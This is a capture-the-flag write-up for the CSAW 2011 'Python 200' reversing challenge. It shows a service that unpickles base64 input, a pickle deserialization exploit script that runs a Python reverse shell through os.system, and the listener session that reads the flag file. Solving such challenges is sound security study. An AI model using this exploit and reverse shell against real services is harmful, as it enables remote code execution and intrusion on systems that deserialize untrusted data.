CSAW 2011 – Reversing – Python 200

Python – 200 Points 

nc csawctf.poly.edu 53080

When we connected to the port it was running a service Haderper:

| Welcome to Haderper!      |
| Please enter your command |
> help

Haderper v0.1-alpha

Command help:

help        - this screen
exec        - execute a command
derp        - derp a string
underp      - underp a string
logout/exit - disconnect

> derp hi
> underp UydoaScKcDAKLg==

If we decode the base64 string we can see that it looks like a Pickle dump file:

$ echo UydoaScKcDAKLg== | base64 -d

After several failed attempts to get a reverse shell or read command output (nc, ls >/dev/tcp, etc) and knowing that the daemon is running on python, we use a reverse shell written in python from reverse shell cheatsheet.

# credits for this code goes to Jeff Epler
import pickle, new, base64

def nasty(module, function, *args):
    return pickle.dumps(new.classobj(function, (), {'__getinitargs__': lambda self, arg = args: arg, '__module__': module}) ())

print "underp "+base64.b64encode(nasty("os", "system", "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")) 

$ python xpl.py | nc csawctf.poly.edu 53080

And our listening nc gets the remote shell:

$ nc -lp 8080
$ id
uid=1001(quine) gid=1001(quine) groups=1001(quine)
$ cd
$ ls
$ cat key.txt


You can see the code for the daemon here.

Leave a Reply

Your email address will not be published. Required fields are marked *